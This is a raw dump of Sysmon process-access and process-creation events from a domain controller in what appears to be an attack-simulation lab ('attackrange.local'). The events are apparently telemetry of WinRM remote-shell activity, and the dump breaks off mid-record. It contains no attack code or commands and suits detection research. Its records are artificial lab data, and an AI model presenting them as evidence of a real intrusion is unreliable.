+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-1500-000000008801}13361668C:\Windows\system32\svchost.exe{D28789B6-7C9E-5FA1-8500-000000008801}4496C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.834{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C9E-5FA1-8500-000000008801}4496C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.834{D28789B6-7C9E-5FA1-8600-000000008801}23921200C:\Windows\system32\conhost.exe{D28789B6-7C9E-5FA1-8500-000000008801}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C9E-5FA1-8600-000000008801}2392C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C9E-5FA1-8500-000000008801}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C9E-5FA1-8500-000000008801}4496C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.825{D28789B6-7C9E-5FA1-8500-000000008801}4496C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C9E-5FA1-0936-050000000000}0x536090HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.818{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002872Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.711{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002871Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.711{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002870Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.711{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002869Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C9E-5FA1-8600-000000008801}23921200C:\Windows\system32\conhost.exe{D28789B6-7C9F-5FA1-8A00-000000008801}1808C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002868Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002867Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002866Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 